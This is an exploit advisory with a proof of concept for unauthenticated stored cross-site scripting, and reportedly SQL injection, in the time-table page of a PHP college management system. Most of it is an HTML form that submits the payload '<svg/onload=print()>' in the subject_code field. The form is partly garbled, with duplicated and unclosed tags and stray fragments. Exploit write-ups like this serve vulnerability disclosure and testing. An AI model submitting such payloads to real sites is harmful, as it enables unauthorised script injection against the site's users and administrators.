# Exploit Title: college management system - Stored Cross-Site Scripting (XSS) Unauthenticated  
# Date: 01/10/2021  
# Exploit Author: Abdulrahman  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: Kali Linux  
in admin/time-table.php in line 1 :  
if (!$_SESSION["LoginAdmin"])  
require_once "../connection/connection.php";  
in admin/time-table.php in line 17 - 27 :  
is vulnerable to XSS and SqlInjection  
Table structure for table `time_table`  
CREATE TABLE `time_table` (  
`id` int(11) NOT NULL,  
`course_code` varchar(10) NOT NULL,  
`semester` int(11) NOT NULL,  
`timing_from` varchar(10) NOT NULL,  
`timing_to` varchar(10) NOT NULL,  
`day` varchar(20) NOT NULL,  
`subject_code` varchar(20) NOT NULL,  
`room_no` int(11) NOT NULL  
20 char  
POC :  
<html lang="en">  
<body class="login-background">  
<!doctype html>  
<html lang="en">  
<meta charset="utf-8">  
<!-- css style goes here -->  
<link rel="stylesheet" href="" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">  
<!-- css style go to end here -->  
<link rel="stylesheet" href="">  
<div class="modal-dialog modal-lg">  
<div class="modal-content">  
<div class="modal-header bg-info text-white">  
<h4 class="modal-title text-center">Add Time Table</h4>  
<div class="modal-body">  
<form action="" method="post">  
<div class="form-group">  
<div class="formp">  
<label for="exampleInputPassword1">day No:</label>  
<input type="text" name="day" class="form-control" value="5">  
<div class="form-group">  
<div class="formp">  
<label for="exampleInputPassword1">subject_code No:</label>  
<input type="text" name="subject_code" class="form-control" value="<svg/onload=print()>">  
<div class="modal-footer">  
<input type="submit" class="btn btn-primary" name="btn_save" value="Save Data">  
<button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>